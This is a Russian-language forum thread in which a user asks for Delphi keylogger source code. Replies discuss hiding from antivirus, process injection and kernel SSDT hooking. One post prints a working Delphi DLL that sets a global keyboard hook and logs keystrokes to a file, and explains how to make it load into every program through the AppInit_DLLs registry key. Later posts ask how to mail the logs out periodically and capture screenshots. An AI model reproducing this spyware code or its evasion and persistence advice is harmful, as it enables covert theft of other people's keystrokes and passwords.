Пожалуйста помогите найти исходники хорошего келоггера на дельфи. Несколько часов голову ломаю но ничего подходящего немогу найти.А мне срочно надо
http://www.delphisources.ru/pages/sources/system/2005_year/key_logger.html http://www.realcoding.net/article/view/4321 http://pblog.ru/?p=69 http://articles.org.ru/cfaq/index.php?qid=1475&catid=50 http://sources.ru/cpp/faqs/49.htm http://www.realcoding.net/article/view/4321 интересно, когда же вы научитесь гуглом пользоватся..
это скорее проблема прямых рук, чем дельфи. да и вопрос не стоял о "безпаливности". http://www.programmersforum.ru/showthread.php?t=5505 http://www.dore.ru/perl/nntp.pl?f=1&gid=8&mid=24390 http://forum.vingrad.ru/index.php?showtopic=76095&unread=1&hl= з.ы. примеры без использования DLL
2 Hellsp@wn По мне - всё что имеет видимый процесс - то паливно ) Безпаливно - это значит очень хорошо, потому как проактивки кейлогеров палят быстро. А так хук в Shadow SDT и хороший получается адрёный хукер. Но на дельфе ты такое врядли напишешь. А так максимум что ты сможешь сделать нормального DLL которая делает всё плохую работу. А там уже методов куча и стандартные виндовые хуки на сообщения и простой сплайсинг но в любом случае - это спалится очень
ну и зачем? инжект в доверенные (способы есть) и ставь хуки какие хочешь, если это не нра ахукай SDT, мешает процесс, пусть будет шелл код. причём здесь вообще дельфи? это всё кодиться на любом языке.
2 Hellsp@wn Неуверен что ты сможешь на делфи похукать SDT и тем более чтобы это у тебя работало. для непосвяшенных это делается в ring0 (kernel-mode) из драйвера. Хотя дрова писать на дельфе - это тру!
и еще пожалуйста подскажите как сделать чтобы через заданный промежуток времени программа выполняла команды,но без TTmer а.например через каждые 3 часа отправляла лог или проверяла подключен ли интернет или размер файла лога.....
после этого даже объяснять ничего не хочется. есть такая вещь, эксплоит называется. если тебе нужен мастер класс пиши в пм проведу, оффтопить хватит. http://www.sql.ru/forum/actualthread.aspx?tid=217966
Ставь касперского 7 на полной проактивке и слушай поросячий визг от установшиков хуков ) На счет шелкода - можно поспорить. Ну вот запустил ты свою прогу, и она заинжектит куданить шелкод. Ну хотябы в тотже эксплорер (WriteProcessMemory) один инжект тебя убьет. Ну ты еще можешь поставить через SetWindowsHookEx хук на Клаву (WH_KEYBOARD) но твоя прога должна тогда выглядеть в виде DLL которая тупо должна грузится к приложениям. А если приложения консольное, то хрен такое сработает. А если паливность вообще закинуть куда подальше, то все средства хороши. Тупо берем пример из DW Code: library Hook; uses Windows, SysUtils; const KF_UP_MY = $40000000; var CurrentHook: HHook; KeyArray: array[0..19] of char; KeyArrayPtr: integer; CurFile:text; function GlobalKeyBoardHook(code: integer; wParam: integer; lParam: integer): longword; stdcall; var i:integer; begin if code< 0 then begin result:=CallNextHookEx(CurrentHook,code,wParam,lparam); Exit; end; if ( (lParam and KF_UP_MY ) = 0) and (wParam> =65) and (wParam< =90) then begin KeyArray[KeyArrayPtr]:=char(wParam); KeyArrayPtr:=KeyArrayPtr+1; if KeyArrayPtr> 19 then begin for i:=0 to 19 do begin Assignfile(CurFile,'d:\log.txt'); if fileexists('d:\log.txt')=false then rewrite(CurFile) else Append(CurFile); write(Curfile, KeyArray[i]); closefile(curfile); end; KeyArrayPtr:=0; end; end; CallNextHookEx(CurrentHook,code,wParam,lparam); result:=0; end; procedure SetupGlobalKeyBoardHook; begin CurrentHook:=SetWindowsHookEx(WH_KEYBOARD, @GlobalKeyBoardHook,HInstance, 0); KeyArrayptr:=0; end; procedure unhook; begin UnhookWindowshookEx(CurrentHook); end; exports SetupGlobalKeyBoardHook, UnHook; begin end. И тупо прописываешь его в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs Вот и тебе и хукер. А там уже добавить таблицу системных кнопок типа ESC и тому подобных, а также по дискриптору окна определяешь имя окна и процесса где это было вписано. Вот тебе и хороший кейлогер. /me ушел вешаться из-за поросячих визгов товарища Касперского.
Hellsp@wn инжект в доверенный процесс это уже давным довно прошлый век и палится на раз! послушай слеша) он умный)
sboy20042 если ты не знаешь способов, это не значит что их вообще нету. или CreateRemoteThread / Set(Get)ThreadContext / QueueUserAPC это предел? miqo http://www.sql.ru/forum/actualthread.aspx?tid=217966
C пеной у рта вы тут все доказываете... а ведь под вин есть дофига способов реализовывать кей логеры... от написания собстенного драйвера клавиатуры до юзанья стандартных хуков (в промежутке можно кучи способов найти двигаясь от ring0 до ring3) Самый клевый кей логгер это аппаратный кей логгер ))) встраиваемый в клаву или в штур и никаких проблем, кроссплатформенный ) Последнее время камперычи всякие и оутпосты так сидят в ядре эх
а может у кого есть исходник с описаниями на асм е.но чтоб было отправка на майл,функция скртншота и т.д.
